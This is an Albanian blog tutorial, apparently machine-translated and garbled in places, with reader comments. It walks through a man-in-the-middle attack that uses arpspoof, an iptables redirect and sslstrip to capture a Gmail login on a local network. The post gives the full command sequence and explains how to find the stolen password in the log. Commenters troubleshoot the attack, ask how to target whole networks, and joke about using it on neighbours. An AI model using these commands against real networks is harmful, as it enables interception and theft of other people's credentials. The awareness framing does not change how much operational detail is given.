Përshëndetje Blogger.
Sot kam një shembull të vogël se sa e rrezikshme mund të jetë të jesh i lidhur në çdo rrjet pa siguri të atyre që na pëlqen kaq shumë prej nesh.
Për sot, unë do të përdor ArpSpoofing me Sslstrip për të marrë një fjalëkalim Gmail. Për ta bërë mjedisin më të kontrolluar, unë kam krijuar një llogari të quajtur "testarp@gmail.com".
Dhe meqenëse nuk më pëlqejnë shumë preambulat, le të merremi me punën.
MJEDISI
Për këtë provë ajo që kemi është si vijon:
1. Sulmuesi: Computershtë kompjuteri im desktop ose desktop që ka Debian Wheezy. Nga depot mund të instaloni sslstrip y dsniff për të marrë të ketë mashtrim me arps
2. Viktima: Viktima është një Tablet Android që dëshiron të shohë postën e tij vetëm përmes shfletuesit.
3. Mediumi: Mesi është imi Ruteri Cisco DPC2425
ADRESAT
Adresa e sulmuesit: 172.26.0.2
Adresa e Routerit: 172.26.0.1
Adresa e Viktimës: 172.26.0.8
Sulmi:
Gjëja e parë që do të bëjmë për këtë sulm është të aktivizojmë përpara në mënyrë që kompjuteri ynë të mund t'ia përcjellë informacionin viktimës pa e vërejtur ata. (Përndryshe do të ishte një sulm i mohimit të shërbimeve)
Për këtë do të përdorim:
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080
arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080
Tani nëse bëjmë bisht -f desdelinux ne e shohim informacionin drejtpërdrejt dhe drejtpërdrejt
Atëherë, si ta marrim atë që duam?
Le të shkruajmë së pari postën tonë në Tablet. Ndërsa hyni, ne shohim se mijëra dhe mijëra gjëra shfaqen në tastierën tonë.
Tani që ka mbaruar, le të hapim skedarin tonë "desdelinux” me nano
nano desdelinux
me Control + W kërkojmë diçka që quhet SIGURIM POST.
Dhe do të shohim diçka të tillë.
Midis asaj linje të madhe që nuk mund të shihet është email-i dhe fjalëkalimi i viktimës.
Kështu që vrapojmë në të djathtë derisa më në fund të shohim dritën në fund të tunelit.
Në një rast tjetër do të shohim se si mund të mbrohemi pak nga këto sulme.
të fala
Shfrytëzoj rastin të them se kur u botua postimi, komandat nuk ishin të drejta.
Komandës iptables në fund i mungon 8080 i cili është në një rresht tjetër. Dhe pastaj komandat arpspoof ishin të gjitha në të njëjtën linjë. Secila komandë është në një linjë të ndryshme.
Shpresojmë që redaktori e sheh atë dhe mund ta rregullojë atë.
Përshëndetje.
Unë kam bërë korrigjimet që përmendni, a është në rregull?
Nëse do të futni kod në një hyrje të preferuar, përdorni pamjen HTML dhe verifikoni që artikulli është i saktë përpara se ta dërgoni atë në pritje. Faleminderit.
Chshtë trishtuese të dihet se ata prej nesh që nuk kanë njohuri janë kaq të prekshëm. Informacion shumë i mirë edhe kur kuptoj pak nga tema e kuptoj rëndësinë. Faleminderit!
të fala
Por kjo funksionon vetëm nëse sulmuesi dhe viktima janë në të njëjtin rrjet. Në çdo rast, më duket se nëse (duke qenë në të njëjtin rrjet) lidheni duke përdorur HTTPS kjo nuk ndodh sepse të dhënat janë të koduara PARA se të largoheni nga makineria juaj. Nëse lidheni me HTTP (pa S) mendoj se edhe duke parë kabllon e rrjetit shihni çelësat.
Nuk eshte e vertete. Po hakoj një fjalëkalim të gmail dhe nëse vëreni se gmail përdor https. Kështu që? Çështja është që edhe pse https është i sigurt, kjo varet nga http. Pra, nuk është aq e sigurt.
Mos rrëfe aq shumë për një https se S nuk është për Supermen se është për "të sigurt"
punon me ose pa https, e kam provuar me një distro më të specializuar linux dhe funksionon pa probleme
Mund ta përdorni saktësisht për t'u dhënë atyre një mësim atyre që vjedhin Wi-Fi tuaj. 😀
Moreshtë pak a shumë si ajo që thanë shumë kohë më parë në blogun e Chema Alonso:
http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html
Ostia, shkëlqyeshëm çfarë bën! / Dhe pastaj ata i tregojnë paranojakut tim sa herë që përdor VPN kur shkojnë për të kontrolluar llogarinë bankare…). Nga rruga duhet të shihni se sa cinikë janë njerëzit në komente ... nëse në fund po vjedh ...
Tani duhet të marrim një udhëzues se si të krijoni dhe të ofroni shërbimin tuaj VPN.
Historia që ju e lidhni është shumë interesante, madje duket e denjë për një libër roman, dhe kjo më bën të kujtoj kur kam përdorur internetin e fqinjëve të mi dhe megjithëse them se e di këtë temë, mendoj se kurrë nuk mund të shihja dimensionet e vërteta të rreziku që mund të kisha të fundit, për fat të mirë për mua, ata ndryshuan vetëm fjalëkalimin në WPA2 dhe aty filloi historia ime me ISP haha
Kjo është arsyeja pse titulli thotë Sslstrip në veprim.
Funksionon, për sa kohë që sulmuesi është në mes
Çfarë vale punoni në prizëm? -.-
nr.
Çfarë po prisni të dërgoni kërkesën tuaj XD
regards
post i mbare
Interesante, unë do të bëj një test arsimor më vonë ... Ndoshta mund të hiqja edhe fjalëkalimin në WiFi dhe të argëtohesha për pak 😛
Për ndonjë rast, a mund të bësh diçka të ngjashme për të dërguar faqe të ndryshme në ato që synon kërkesa? Për shembull, ata duan të hapin Facebook dhe unë i ridrejtoj te Google? 😛
Po. Por e gjitha është një listë shumë e ndryshme.
Ndoshta do ta postoj më vonë.
post shumë i mirë, këto tema janë shumë edukative, tani ne duhet të jemi në gjendje t'i kundërvihemi këtij sulmi, pasi që disa (si unë) lidhen me rrjete publike (universiteti për shembull) do të ishte e dobishme ta shmangni atë.
Përshëndetje!
Nuk më funksionoi
Diçka më dështon këtu, përveç faktit që lidhjet https janë të koduara përmes një çertifikate serveri (pasi të keni certifikatën në kompjuterin tuaj, shfletuesi juaj është përgjegjës për enkriptimin) me iptables ju ridrejtoni portën 80 (http), jo 443 , e cila është https
Edhe une mendova. Çështja është se megjithëse https është "i sigurt", për fat të keq varet nga http. Pra, sslstrip përfiton nga kjo, kjo e bën shfletuesin të besojë se po përdor kredencialet https por nuk është kështu.
mut i shenjte! por shfletuesi duhet të shohë një paralajmërim si "kjo certifikatë vjen nga një sit i dyshimtë ose diçka e tillë" ... Unë patjetër do të duhet të bëj testet XD
Jo, absolutisht asgjë nuk del.
Më në fund funksionoi për mua
Unë jam i lidhur në një rrjet WEP me fjalëkalim dhe gjithsesi më tregoi fjalëkalimin.
Një pyetje. A mund ta bëni të njëjtën procedurë, por për të gjithë kompjuterët që janë të lidhur në rrjet, në vend që të keni një viktimë të vetme?
Po ti mundesh. Por nuk kam bërë eksperimente. Provojeni vetë dhe na tregoni si shkon.
E vetmja gjë që marr me këtë është që makina e viktimës të shkojë jashtë linje, por sslstrip nuk më tregon asgjë: /
Ju duhet të çaktivizoni firewall për një moment. Ose të paktën mundësoni lidhjet hyrëse.
Probe dhe unë mund të shikonim vetëm emrin e përdoruesit dhe fjalëkalimin e faqes në facebook, në gmail nuk gjeta ndonjë rezultat në regjistër, gjithashtu më duhej vetëm një linjë arpspoof «arpspoof -i -t«. Nga ana tjetër, makina e viktimës nuk mund të hapte disa faqe. Unë do të vazhdoj hetimet, është shumë interesante. Një ndihmë për ata që përdorin Manjaro, paketat për të instaluar janë: dsniff (këtu është arpspoff), të përdredhur dhe python2-pyopenssl. Sslstrip mund të shkarkohet nga këtu: http://www.thoughtcrime.org/software/sslstrip/
Për ta ekzekutuar atë $ python2 sslstrip.py
Përshëndetje.
Nuk doli por linja arpspoof është: #arpspoof -i int -t ip-viktimë ip-router
shiko bej pikerisht ate qe thua ti:
echo "1"> / proc / sys / net / ipv4 / ip_para iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 8080
arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
Problemi është se viktima, i cili është një kompjuter tjetër që unë kam këtu në dhomën time, mbetet pa lidhje me atë pikë që duhet të rindez routerin, çfarë të bëj, më ndihmo.
Një gjë tjetër që unë jam duke punuar me një makinë virtuale, dhe kur ekzekutoj komandën iwconfig, wlan0 nuk shfaqet, as kur ekzekutoj ifconfig, megjithatë nëse kam internet në makinën time virtuale çfarë me një ndërfaqe eth0.